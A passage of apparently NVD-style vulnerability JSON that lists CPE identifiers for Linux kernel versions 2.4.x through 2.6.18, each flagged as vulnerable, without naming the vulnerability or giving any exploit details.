                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.39:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.46:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.47:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.53:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.54:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.60:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.61:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.69:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.7:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:test2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:test3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.1:rc1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.1:rc2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11.10:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11.6:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11.7:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11_rc1_bk6:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.21:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.23:pre9:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.23_ow2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.27:pre2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.27:pre3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.3:pre3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.30:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.32:pre2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.33:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.34.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.34.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.34:rc3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.8:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.9:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.13:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.14:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.21:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.22:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.29:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.3:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.36:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.37:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.44:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.45:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.51:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.52:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.59:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.6:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.67:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.68:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:test10:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:test11:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:test8:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:test9:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.10:rc3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11.5:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11:rc3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11:rc4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11:rc5:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.21:pre7:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.22:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.25:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.26:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.29:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.29:rc1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.31:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.31:pre1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.33.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.33.5:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.5:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.10:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.17:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.18:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.25:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.26:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.32:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.33:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.40:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.41:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.48:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.49:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.55:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.56:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.62:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.63:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.64:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.8:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.9:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:test4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:test5:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.1:rc3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.10:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11.11:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11.12:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11.8:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.22:pre10:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.23:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.27:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.27:pre1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.29:rc2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.3:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.32:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.32:pre1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.33:pre1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.34:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.6:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.7:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.11:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.12:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.19:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.20:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.27:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.28:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.34:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.35:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.42:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.5:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.50:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.57:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.58:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.65:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11.9:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.12.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.12.12:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.13.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.13.3:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.13:rc6:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.13:rc7:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.14.6:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.14.7:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.15.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.15.11:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.15:rc2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.15:rc3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.10:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.11:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.18:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.19:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.26:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.27:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.33:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.34:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.41:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.5:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.50:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.9:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16:rc1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.10:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.5:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17:rc3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17:rc4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18.5:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18.6:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:rc5:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:rc6:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.12:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.12.5:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.12.6:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.13:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.13.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.13:rc4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.13:rc5:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.14.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.14.5:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
